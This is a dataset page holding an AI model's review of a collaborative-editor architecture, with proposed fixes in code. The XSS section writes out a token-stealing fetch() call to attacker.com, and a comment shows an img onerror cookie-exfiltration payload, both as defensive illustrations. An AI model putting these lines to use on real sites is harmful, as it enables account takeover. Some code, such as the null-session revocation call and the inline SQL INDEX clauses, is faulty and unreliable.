3 models have responded to the "Debug This Architecture" challenge. Compare their approaches side-by-side on RIVAL. This response is part of RIVAL's open dataset of 5,600+ AI model responses.
Claude Sonnet 4.6's response to the 'Debug This Architecture' challenge.
Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
This architecture has critical flaws that will cause data loss, security vulnerabilities, and poor user experience at scale. I've identified 18 distinct issues across 6 categories. Several are severe enough to cause silent data corruption in production today.
Severity: CRITICAL — Silent data loss in production
Scenario demonstrating the problem:
─────────────────────────────────────────────────────
User A (clock: accurate) User B (clock: 5min fast)
─────────────────────────────────────────────────────
12:00:00 - Types "Hello" 11:59:00 - Types "World"
(clock is ahead, so B's
timestamp is EARLIER)
Result: "Hello" wins because it has the later timestamp
BUT User B typed after User A in wall-clock time.
Worse scenario:
User B's laptop has clock skewed +1 hour.
User B can now PERMANENTLY win every conflict
for an entire hour, silently discarding all other
users' changes with no indication to anyone.
─────────────────────────────────────────────────────
The deeper problem: LWW at the paragraph level means any concurrent edit to the same paragraph results in one user's work being silently discarded. There's no merge, no notification, no recovery.
Solution: Operational Transformation (OT) or CRDTs
// Current broken approach
function resolveConflict(changeA, changeB) {
// Silent data loss - one change disappears forever
return changeA.clientTimestamp > changeB.clientTimestamp
? changeA
: changeB;
}
// Better approach: Vector clocks for causal ordering
class VectorClock {
constructor(nodeId) {
this.nodeId = nodeId;
this.clock = {}; // { userId: counter }
}
increment() {
this.clock[this.nodeId] = (this.clock[this.nodeId] || 0) + 1;
return { ...this.clock };
}
// Merge clocks when receiving remote event
merge(remoteClock) {
for (const [node, time] of Object.entries(remoteClock)) {
this.clock[node] = Math.max(this.clock[node] || 0, time);
}
}
// Returns: 'before' | 'after' | 'concurrent'
compare(otherClock) {
let aAheadOfB = false;
let bAheadOfA = false;
const allNodes = new Set([
...Object.keys(this.clock),
...Object.keys(otherClock)
]);
for (const node of allNodes) {
const aTime = this.clock[node] || 0;
const bTime = otherClock[node] || 0;
if (aTime > bTime) aAheadOfB = true;
if (bTime > aTime) bAheadOfA = true;
}
if (aAheadOfB && !bAheadOfA) return 'after';
if (bAheadOfA && !aAheadOfB) return 'before';
if (aAheadOfB && bAheadOfA) return 'concurrent'; // True conflict
return 'equal';
}
}
// Production recommendation: Use CRDT library (Yjs or Automerge)
// Yjs example - handles all of this automatically:
import * as Y from 'yjs'
const ydoc = new Y.Doc()
const ytext = ydoc.getText('document')
// This merge is mathematically guaranteed to converge
// to the same result on all clients regardless of
// operation order or network delays
ytext.insert(0, 'Hello') // User A
ytext.insert(5, ' World') // User B - both changes preserved
Trade-offs:
| Approach | Correctness | Complexity | Bandwidth |
|---|---|---|---|
| LWW (current) | ❌ Data loss | Low | Low |
| OT | ✅ Correct | Very High | Medium |
| CRDT (Yjs) | ✅ Correct | Medium (library) | Higher |
| CRDT (Automerge) | ✅ Correct | Medium (library) | Highest |
Recommendation: Use Yjs — battle-tested, used by major editors, handles offline sync, has existing WebSocket provider.
Severity: HIGH — Data loss window + storage explosion
Problems with this approach:
┌─────────────────────────────────────────────────────────┐
│ User types for 29 seconds → server crashes │
│ Result: 29 seconds of work LOST with no warning │
│ │
│ Storage growth example: │
│ Document: 50KB HTML │
│ 10 active users × 2 snapshots/min × 60min = 60GB/day │
│ For 1000 concurrent documents = 60TB/day │
│ │
│ No change history = no undo beyond browser state │
│ No audit trail = compliance nightmare │
└─────────────────────────────────────────────────────────┘
Solution: Operation log with periodic compaction
// Store operations, not snapshots
const schema = `
-- Append-only operation log
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
user_id UUID NOT NULL,
op_type TEXT NOT NULL, -- 'insert' | 'delete' | 'format'
position INTEGER,
content TEXT,
attributes JSONB,
vector_clock JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
-- Efficient queries for sync
INDEX idx_doc_ops (document_id, id),
INDEX idx_doc_ops_since (document_id, created_at)
);
-- Periodic snapshots for fast loading (not primary storage)
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
snapshot_at BIGINT NOT NULL, -- operation ID at snapshot time
content JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY (document_id, snapshot_at)
);
`;
class DocumentStorage {
async applyOperation(docId, operation) {
return await this.db.transaction(async (trx) => {
// Write operation to log
const [op] = await trx('document_operations')
.insert({
document_id: docId,
...operation,
vector_clock: JSON.stringify(operation.vectorClock)
})
.returning('*');
// Check if we should create a snapshot
// (every 1000 ops or 10 minutes, whichever comes first)
await this.maybeSnapshot(docId, op.id, trx);
return op;
});
}
async loadDocument(docId, sinceOpId = null) {
if (sinceOpId) {
// Incremental sync: only fetch ops since last known state
return await this.db('document_operations')
.where('document_id', docId)
.where('id', '>', sinceOpId)
.orderBy('id', 'asc');
}
// Full load: find nearest snapshot, then apply subsequent ops
const snapshot = await this.db('document_snapshots')
.where('document_id', docId)
.orderBy('snapshot_at', 'desc')
.first();
const ops = await this.db('document_operations')
.where('document_id', docId)
.where('id', '>', snapshot?.snapshot_at ?? 0)
.orderBy('id', 'asc');
return { snapshot, ops };
}
}
Trade-offs:
Severity: HIGH
Current polling behavior:
─────────────────────────────────────────────────────────
Server A (User A connected) Server B (User B connected)
─────────────────────────────────────────────────────────
User A types "H"
→ Saved to PostgreSQL
Server B polls... (0-2s wait)
User B sees "H" appear
(up to 2 second delay)
At scale:
10 servers × 1 poll/2sec × 1000 documents = 5,000 queries/sec
just for polling, before any real work
─────────────────────────────────────────────────────────
Solution: Redis Pub/Sub for cross-server broadcasting
// Replace polling with event-driven pub/sub
import { createClient } from 'redis';
class RealtimeSync {
constructor() {
// Separate clients required - subscriber can't do other operations
this.publisher = createClient();
this.subscriber = createClient();
this.localSockets = new Map(); // docId → Set<WebSocket>
}
async initialize() {
await this.publisher.connect();
await this.subscriber.connect();
// Subscribe to ALL document channels on this server
// Pattern subscription avoids per-document subscriptions
await this.subscriber.pSubscribe(
'doc:*',
(message, channel) => {
const docId = channel.replace('doc:', '');
this.broadcastToLocalClients(docId, JSON.parse(message));
}
);
}
async publishChange(docId, change) {
// Broadcast to all servers instantly (no polling delay)
await this.publisher.publish(
`doc:${docId}`,
JSON.stringify({
...change,
serverId: process.env.SERVER_ID, // Prevent echo to self
timestamp: Date.now()
})
);
}
broadcastToLocalClients(docId, change) {
const sockets = this.localSockets.get(docId);
if (!sockets) return;
const message = JSON.stringify(change);
for (const socket of sockets) {
// Skip the originating connection if on this server
if (socket.userId !== change.userId && socket.readyState === WebSocket.OPEN) {
socket.send(message);
}
}
}
// Track which documents have clients on this server
registerClient(docId, socket) {
if (!this.localSockets.has(docId)) {
this.localSockets.set(docId, new Set());
}
this.localSockets.get(docId).add(socket);
}
deregisterClient(docId, socket) {
this.localSockets.get(docId)?.delete(socket);
}
}
Latency comparison:
Polling (current): 0ms ──────────────── 2000ms (average 1000ms)
Redis Pub/Sub: 0ms ── ~5ms (typical Redis latency)
Trade-offs:
Severity: HIGH — Causes document divergence between clients
Divergence scenario with current architecture:
──────────────────────────────────────────────────────────
Document state: "AC"
User A: insert 'B' at position 1 → "ABC" (op: ins(1,'B'))
User B: insert 'X' at position 1 → "AXC" (op: ins(1,'X'))
Both ops sent simultaneously. Server applies A then B:
ins(1,'B') → "ABC"
ins(1,'X') → "AXBC" ← Server state
User A receives B's op: ins(1,'X') applied to "ABC"
→ "AXBC" ✓ (accidentally correct here)
But User B receives A's op: ins(1,'B') applied to "AXC"
→ "ABXC" ✗ ← DIVERGED from server's "AXBC"
Users are now looking at different documents with no indication.
──────────────────────────────────────────────────────────
Solution: Server-side operation transformation
// Simplified OT for insert/delete operations
// (Production: use ShareDB or Yjs which handle this correctly)
class OperationTransformer {
// Transform operation A against operation B
// Returns A' such that: apply(apply(doc, B), A') = apply(apply(doc, A), B')
transform(opA, opB) {
if (opA.type === 'insert' && opB.type === 'insert') {
return this.transformInsertInsert(opA, opB);
}
if (opA.type === 'insert' && opB.type === 'delete') {
return this.transformInsertDelete(opA, opB);
}
if (opA.type === 'delete' && opB.type === 'insert') {
return this.transformDeleteInsert(opA, opB);
}
if (opA.type === 'delete' && opB.type === 'delete') {
return this.transformDeleteDelete(opA, opB);
}
}
transformInsertInsert(opA, opB) {
// If B inserts before A's position, shift A right
if (opB.position < opA.position ||
(opB.position === opA.position && opB.userId < opA.userId)) {
return { ...opA, position: opA.position + opB.content.length };
}
return opA; // B inserts after A, no adjustment needed
}
transformInsertDelete(opA, opB) {
if (opB.position < opA.position) {
// B deleted content before A's insert point
return { ...opA, position: opA.position - opB.length };
}
return opA;
}
// ... additional transform cases
}
class DocumentServer {
constructor() {
this.transformer = new OperationTransformer();
// Server maintains authoritative operation history
this.opHistory = new Map(); // docId → Operation[]
}
async applyOperation(docId, incomingOp) {
const history = this.opHistory.get(docId) || [];
// Find operations that happened concurrently with this one
// (all ops the client hadn't seen when they sent this op)
const concurrentOps = history.slice(incomingOp.knownRevision);
// Transform incoming op against all concurrent ops
let transformedOp = incomingOp;
for (const concurrentOp of concurrentOps) {
transformedOp = this.transformer.transform(transformedOp, concurrentOp);
}
// Apply transformed op and assign authoritative revision
transformedOp.revision = history.length;
history.push(transformedOp);
return transformedOp; // Send this to all other clients
}
}
Recommendation: Don't implement OT from scratch — use ShareDB (OT-based, battle-tested) or Yjs (CRDT-based, simpler mental model). Both handle all these edge cases.
Severity: CRITICAL — Complete account takeover possible
Attack vector:
─────────────────────────────────────────────────────────
1. Attacker finds XSS vulnerability (e.g., in document
content rendered without sanitization — likely given
this stores HTML)
2. Malicious script injected:
fetch('https://attacker.com/steal?token=' +
localStorage.getItem('jwt_token'))
3. Attacker now has valid 24-hour JWT
4. Can impersonate user, access all documents
5. User has NO way to invalidate it (JWTs are stateless)
─────────────────────────────────────────────────────────
Solution: HttpOnly cookies + token rotation
// Server-side: Set tokens in HttpOnly cookies
app.post('/auth/login', async (req, res) => {
const user = await authenticateUser(req.body);
const accessToken = generateAccessToken(user, '15m'); // Short-lived
const refreshToken = generateRefreshToken(user); // Long-lived
// Store refresh token in DB for revocation capability
await db('refresh_tokens').insert({
token_hash: hash(refreshToken),
user_id: user.id,
expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000),
created_at: new Date()
});
// HttpOnly = JavaScript cannot access this cookie
// Secure = HTTPS only
// SameSite = CSRF protection
res.cookie('access_token', accessToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000 // 15 minutes
});
res.cookie('refresh_token', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
path: '/auth/refresh', // Only sent to refresh endpoint
maxAge: 30 * 24 * 60 * 60 * 1000
});
res.json({ user: sanitizeUser(user) }); // No token in response body
});
// Silent token refresh before expiry
app.post('/auth/refresh', async (req, res) => {
const refreshToken = req.cookies.refresh_token;
if (!refreshToken) return res.status(401).json({ error: 'No refresh token' });
// Check token hasn't been revoked
const stored = await db('refresh_tokens')
.where('token_hash', hash(refreshToken))
.where('expires_at', '>', new Date())
.whereNull('revoked_at')
.first();
if (!stored) {
// Possible token theft - revoke all user sessions
await revokeAllUserSessions(stored?.user_id);
return res.status(401).json({ error: 'Invalid refresh token' });
}
// Rotate refresh token (detect replay attacks)
await db('refresh_tokens')
.where('id', stored.id)
.update({ revoked_at: new Date() });
const newAccessToken = generateAccessToken(stored.user_id, '15m');
const newRefreshToken = generateRefreshToken(stored.user_id);
await db('refresh_tokens').insert({
token_hash: hash(newRefreshToken),
user_id: stored.user_id,
expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000)
});
res.cookie('access_token', newAccessToken, { httpOnly: true, secure: true, sameSite: 'strict' });
res.cookie('refresh_token', newRefreshToken, {
httpOnly: true, secure: true, sameSite: 'strict', path: '/auth/refresh'
});
res.json({ ok: true });
});
Trade-offs:
Severity: CRITICAL
// Current: storing and rendering raw HTML is dangerous
// A user can embed: <script>stealAllDocuments()</script>
// Or: <img src="x" onerror="exfiltrate(document.cookie)">
// Solution: Never store or render raw HTML
// Use a structured document format instead
// Store as structured JSON (like ProseMirror/Slate schema)
const documentSchema = {
type: 'doc',
content: [
{
type: 'paragraph',
attrs: { align: 'left' },
content: [
{ type: 'text', text: 'Hello world', marks: [{ type: 'bold' }] }
]
}
]
};
// When rendering, use a whitelist-based renderer
// that ONLY renders known-safe node types
class SafeRenderer {
ALLOWED_NODES = new Set(['doc', 'paragraph', 'text', 'heading',
'bulletList', 'listItem', 'codeBlock']);
ALLOWED_MARKS = new Set(['bold', 'italic', 'underline', 'code', 'link']);
ALLOWED_LINK_PROTOCOLS = new Set(['https:', 'http:', 'mailto:']);
render(node) {
if (!this.ALLOWED_NODES.has(node.type)) {
console.warn(`Blocked disallowed node type: ${node.type}`);
return ''; // Drop unknown nodes entirely
}
// ... render each node type explicitly
}
renderMark(mark, content) {
if (!this.ALLOWED_MARKS.has(mark.type)) return content;
if (mark.type === 'link') {
const url = new URL(mark.attrs.href);
if (!this.ALLOWED_LINK_PROTOCOLS.has(url.protocol)) return content;
// Note: rel="noopener noreferrer" prevents tab-napping
return `<a href="${escapeHtml(mark.attrs.href)}"
rel="noopener noreferrer"
target="_blank">${content}</a>`;
}
// ... other marks
}
}
Severity: CRITICAL
Catastrophic scenario:
─────────────────────────────────────────────────────────
User A: GET /api/documents/secret-doc
→ CloudFront caches response for 5 minutes
User B (different org, no access): GET /api/documents/secret-doc
→ CloudFront serves cached response ← CONFIDENTIAL DATA LEAK
─────────────────────────────────────────────────────────
Solution: Never cache authenticated API responses at CDN
// Middleware to set correct cache headers on ALL API responses
app.use('/api', (req, res, next) => {
// Prevent any caching of API responses
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, private',
'Pragma': 'no-cache',
'Surrogate-Control': 'no-store', // CDN-specific header
'CDN-Cache-Control': 'no-store' // CloudFront specific
});
next();
});
// CDN should ONLY cache:
// - Static assets (JS, CSS, images) → long cache + content hash filenames
// - Public, unauthenticated content only
// - Never anything with Authorization header or session cookies
// CloudFront behavior configuration (infrastructure as code):
const cloudFrontConfig = {
behaviors: [
{
pathPattern: '/api/*',
cachePolicyId: 'CACHING_DISABLED', // AWS managed policy
originRequestPolicyId: 'ALL_VIEWER', // Forward all headers
},
{
pathPattern: '/static/*',
cachePolicyId: 'CACHING_OPTIMIZED',
// Static assets use content-hash filenames: main.a3f8b2.js
// Safe to cache for 1 year
}
]
};
Severity: HIGH — Changes lost on any network hiccup
Current behavior on disconnect:
─────────────────────────────────────────────────────────
User types 500 chars → network blip for 3 seconds
→ WebSocket drops
→ Those 500 chars are GONE (never reached server)
→ User doesn't know
→ User continues typing on now-stale document
→ Reconnects to DIFFERENT server (round-robin LB)
→ Server has no knowledge of this client's state
→ Document state is now inconsistent
─────────────────────────────────────────────────────────
Solution: Client-side operation queue with acknowledgments
class ResilientWebSocketClient {
constructor(url) {
this.url = url;
this.pendingOps = []; // Ops sent but not acknowledged
this.unsentOps = []; // Ops not yet sent
this.lastServerRevision = 0;
this.reconnectDelay = 1000;
this.maxReconnectDelay = 30000;
this.connected = false;
}
connect() {
this.ws = new WebSocket(this.url);
this.ws.onopen = () => {
this.connected = true;
this.reconnectDelay = 1000; // Reset backoff
// Rejoin document with last known state
// Server can send us everything we missed
this.ws.send(JSON.stringify({
type: 'rejoin',
documentId: this.documentId,
lastKnownRevision: this.lastServerRevision
}));
// Resend any unacknowledged operations
this.flushPendingOps();
};
this.ws.onmessage = (event) => {
const msg = JSON.parse(event.data);
if (msg.type === 'ack') {
// Server confirmed receipt - remove from pending
this.pendingOps = this.pendingOps.filter(op => op.id !== msg.opId);
this.lastServerRevision = msg.revision;
} else if (msg.type === 'operation') {
this.handleRemoteOperation(msg);
} else if (msg.type === 'catchup') {
// Server sending us ops we missed during disconnect
msg.operations.forEach(op => this.handleRemoteOperation(op));
}
};
this.ws.onclose = () => {
this.connected = false;
this.scheduleReconnect();
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
// onclose will fire after onerror, triggering reconnect
};
}
sendOperation(op) {
const envelope = {
...op,
id: generateId(),
clientRevision: this.lastServerRevision
};
if (this.connected) {
this.pendingOps.push(envelope);
this.ws.send(JSON.stringify(envelope));
} else {
// Queue for when connection restores
this.unsentOps.push(envelope);
}
}
flushPendingOps() {
// Resend ops that were sent but not acknowledged
for (const op of this.pendingOps) {
this.ws.send(JSON.stringify(op));
}
// Send ops that were queued while disconnected
for (const op of this.unsentOps) {
this.pendingOps.push(op);
this.ws.send(JSON.stringify(op));
}
this.unsentOps = [];
}
scheduleReconnect() {
setTimeout(() => {
this.reconnectDelay = Math.min(
this.reconnectDelay * 2, // Exponential backoff
this.maxReconnectDelay
);
this.connect();
}, this.reconnectDelay + Math.random() * 1000); // Jitter prevents thundering herd
}
}
Severity: HIGH
Round-robin load balancing with WebSockets:
─────────────────────────────────────────────────────────
Client connects to Server A → WebSocket established
Client's HTTP request (token refresh) → routed to Server B
Server B has no WebSocket context for this client
Server A goes down → client reconnects to Server B
Server B has no document state for this client
─────────────────────────────────────────────────────────
Solution: Sticky sessions OR stateless WebSocket servers
Option 1: Sticky sessions (simpler, less resilient)
─────────────────────────────────────────────────────────
Load Balancer config:
- Hash client IP or session ID
- Always route same client to same server
- Problem: server failure still drops all its connections
- Problem: uneven load distribution
Option 2: Stateless WebSocket servers (recommended)
─────────────────────────────────────────────────────────
All connection state stored in Redis:
- Active document sessions
- Client cursor positions
- Pending operations per client
- Any server can handle any client
┌─────────┐ ┌─────────────────────────────────┐
│ Client │────▶│ Any WebSocket Server │
└─────────┘ │ (stateless - reads from Redis) │
└──────────────┬──────────────────┘
│
┌──────────▼──────────┐
│ Redis Cluster │
│ - Session state │
│ - Pub/Sub channels │
│ - Op queues │
└─────────────────────┘
Severity: HIGH — Will become bottleneck at scale
Current write pattern per keystroke:
─────────────────────────────────────────────────────────
User types one character:
1. INSERT into document_changes (PostgreSQL write)
2. 9 other servers poll SELECT (PostgreSQL reads × 9)
3. Repeat for every character typed by every user
At 100 concurrent users typing at 3 chars/sec:
- 300 writes/sec
- 300 × (N-1) polling reads (grows with server count)
- At 10 servers: 2,700 reads/sec just for polling
- Polling reads compete with document load queries
─────────────────────────────────────────────────────────
Solution: Separate concerns — PostgreSQL for durability, Redis for real-time
Revised data flow:
─────────────────────────────────────────────────────────
User types → WebSocket → Server
├──▶ Redis Pub/Sub (real-time broadcast, ~1ms)
└──▶ Operation log buffer
│
└──▶ Batch write to PostgreSQL
(every 100ms or 50 ops)
─────────────────────────────────────────────────────────
Benefits:
- Real-time path: Redis only (fast, no DB load)
- Durability path: PostgreSQL (batched, efficient)
- Separation allows independent scaling
class OperationBuffer {
constructor() {
this.buffer = new Map(); // docId → Operation[]
this.flushInterval = setInterval(() => this.flush(), 100);
// Flush on shutdown to prevent data loss
process.on('SIGTERM', async () => {
clearInterval(this.flushInterval);
await this.flush();
process.exit(0);
});
}
add(docId, operation) {
if (!this.buffer.has(docId)) {
this.buffer.set(docId, []);
}
this.buffer.get(docId).push(operation);
// Immediate flush if buffer is large
if (this.buffer.get(docId).length >= 50) {
this.flushDocument(docId);
}
}
async flush() {
const promises = [];
for (const docId of this.buffer.keys()) {
promises.push(this.flushDocument(docId));
}
await Promise.all(promises);
}
async flushDocument(docId) {
const ops = this.buffer.get(docId);
if (!ops || ops.length === 0) return;
this.buffer.set(docId, []); // Clear before async op to avoid double-write
try {
// Bulk insert is much more efficient than individual inserts
await db('document_operations').insert(ops);
} catch (error) {
// Put ops back in buffer for retry
const current = this.buffer.get(docId) || [];
this.buffer.set(docId, [...ops, ...current]);
throw error;
}
}
}
Severity: MEDIUM
Problem with org-based partitioning:
─────────────────────────────────────────────────────────
Google (org_id: 1) has 50,000 employees all editing docs
→ All their data on one partition → overloaded
Startup (org_id: 2) has 5 employees
→ Their partition is nearly idle
Result: Uneven load, one partition becomes bottleneck
regardless of adding more hardware
─────────────────────────────────────────────────────────
Solution: Composite partition key with consistent hashing
-- Partition by document_id (UUID) for even distribution
-- Keep org_id for efficient org-level queries via index
CREATE TABLE documents (
id UUID DEFAULT gen_random_uuid(),
org_id UUID NOT NULL,
title TEXT,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (id); -- Even distribution regardless of org size
-- Create partitions
CREATE TABLE documents_p0 PARTITION OF documents
FOR VALUES WITH (modulus 8, remainder 0);
-- ... through documents_p7
-- Efficient org-level queries still possible via index
CREATE INDEX idx_documents_org ON documents (org_id, created_at DESC);
-- For operation log, partition by document_id + time range
-- This enables efficient pruning of old operations
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
-- ... other columns
) PARTITION BY RANGE (created_at);
-- Monthly partitions enable easy archival
CREATE TABLE document_operations_2024_01
PARTITION OF document_operations
FOR VALUES FROM ('2024-01-01') TO ('2024-02-01');
Severity: MEDIUM
// Without connection pooling, each server opens many DB connections
// PostgreSQL has hard limits (~100-500 connections)
// 20 servers × 50 connections each = 1,000 connections → DB crashes
// Solution: PgBouncer as connection pooler
// Architecture:
// App Servers → PgBouncer (transaction pooling) → PostgreSQL
//
// PgBouncer in transaction mode:
// - 20 servers can share 20 actual DB connections
// - Connections returned to pool after each transaction
// - PostgreSQL sees manageable connection count
// Application configuration
const pool = new Pool({
host: 'pgbouncer', // Point to PgBouncer, not PostgreSQL directly
max: 10, // Per-server pool size (PgBouncer multiplexes these)
idleTimeoutMillis: 30000,
connectionTimeoutMillis: 2000,
// Critical: PgBouncer transaction mode doesn't support
// prepared statements - disable them
statement_timeout: 5000,
});
// Monitor pool health
pool.on('error', (err) => {
logger.error('Unexpected pool error', err);
metrics.increment('db.pool.error');
});
Severity: MEDIUM — Core feature gap
// Users can't see each other's cursors/selections
// This is a fundamental collaborative editing feature
class PresenceManager {
constructor(redis) {
this.redis = redis;
this.PRESENCE_TTL = 30; // seconds
}
async updatePresence(docId, userId, presenceData) {
const key = `presence:${docId}:${userId}`;
await this.redis.setEx(
key,
this.PRESENCE_TTL,
JSON.stringify({
userId,
cursor: presenceData.cursor, // { paragraph, offset }
selection: presenceData.selection, // { anchor, head }
color: presenceData.color, // Assigned color for this user
name: presenceData.displayName,
lastSeen: Date.now()
})
);
// Notify other clients of presence update
await this.redis.publish(
`presence:${docId}`,
JSON.stringify({ type: 'presence_update', userId, ...presenceData })
);
}
async getDocumentPresence(docId) {
const pattern = `presence:${docId}:*`;
const keys = await this.redis.keys(pattern);
if (keys.length === 0) return [];
const values = await this.redis.mGet(keys);
return values
.filter(Boolean)
.map(v => JSON.parse(v));
}
async removePresence(docId, userId) {
await this.redis.del(`presence:${docId}:${userId}`);
await this.redis.publish(
`presence:${docId}`,
JSON.stringify({ type: 'presence_leave', userId })
);
}
}
Severity: HIGH — Cascading failure risk
import CircuitBreaker from 'opossum';
// Without circuit breakers:
// PostgreSQL slows down → all requests wait → servers exhaust threads
// → entire application becomes unresponsive
// → users see spinning wheels, not helpful errors
const dbCircuitBreaker = new CircuitBreaker(
async (query) => await db.raw(query),
{
timeout: 3000, // Call fails if takes longer than 3s
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30s
volumeThreshold: 10, // Minimum calls before evaluating
}
);
dbCircuitBreaker.fallback(async (query) => {
// Degraded mode: serve from cache if available
const cached = await redis.get(`query_cache:${hash(query)}`);
if (cached) {
metrics.increment('circuit_breaker.cache_hit');
return JSON.parse(cached);
}
// Return meaningful error instead of hanging
throw new ServiceUnavailableError(
'Document service temporarily unavailable. Your changes are saved locally.'
);
});
dbCircuitBreaker.on('open', () => {
logger.error('DB circuit breaker OPEN - database unreachable');
alerting.critical('Database circuit breaker opened');
});
dbCircuitBreaker.on('halfOpen', () => {
logger.info('DB circuit breaker testing recovery');
});
dbCircuitBreaker.on('close', () => {
logger.info('DB circuit breaker closed - database recovered');
});
┌────────────────────────────────────────────────────────────────────────┐
│ PRIORITY MATRIX │
├──────────────────────────────────────┬────────────┬────────────────────┤
│ Issue │ Severity │ Fix Complexity │
├──────────────────────────────────────┼────────────┼────────────────────┤
│ CDN caching authenticated responses │ CRITICAL │ Low (config change)│
│ JWT in localStorage (XSS) │ CRITICAL │ Medium │
│ HTML storage (XSS injection) │ CRITICAL │ High │
│ LWW with client clocks │ CRITICAL │ High (CRDT/OT) │
│ No OT/CRDT (document divergence) │ HIGH │ High │
│ 2-second polling │ HIGH │ Medium (Redis) │
│ No WebSocket reconnection │ HIGH │ Medium │
│ Full snapshot storage (data loss) │ HIGH │ High │
│ No circuit breakers │ HIGH │ Low (library) │
│ LB breaks WebSocket routing │ HIGH │ Medium │
│ PostgreSQL as message bus │ HIGH │ Medium │
│ Hot partition (org-based) │ MEDIUM │ Medium │
│ No connection pooling │ MEDIUM │ Low (PgBouncer) │
│ No presence/cursor sync │ MEDIUM │ Medium │
│ No graceful degradation │ MEDIUM │ Low (library) │
│ 24h JWT expiry (too long) │ MEDIUM │ Low │
│ No operation acknowledgment │ MEDIUM │ Medium │
│ No audit log │ LOW │ Low (side effect │
│ │ │ of op log) │
└──────────────────────────────────────┴────────────┴────────────────────┘
Week 1 — Fix critical security issues (no architectural changes required):
1. Move CDN to never cache /api/* routes
2. Migrate JWT to HttpOnly cookies
3. Sanitize document content (stop storing raw HTML)
Week 2-3 — Fix data integrity:
4. Integrate Yjs for CRDT-based sync
5. Switch to operation log storage
6. Add Redis Pub/Sub (eliminate polling)
Week 4-5 — Fix resilience:
7. Implement WebSocket reconnection with op queue
8. Add circuit breakers
9. Deploy PgBouncer
Week 6+ — Scaling improvements:
10. Stateless WebSocket servers
11. Fix partition strategy
12. Add presence/cursor sync
The three issues you can fix today with no architectural changes (CDN caching, localStorage JWT, HTML injection) are also the three that could cause immediate catastrophic data breaches. Start there.
Turn this model response into notes, narration, or a short video
Partner link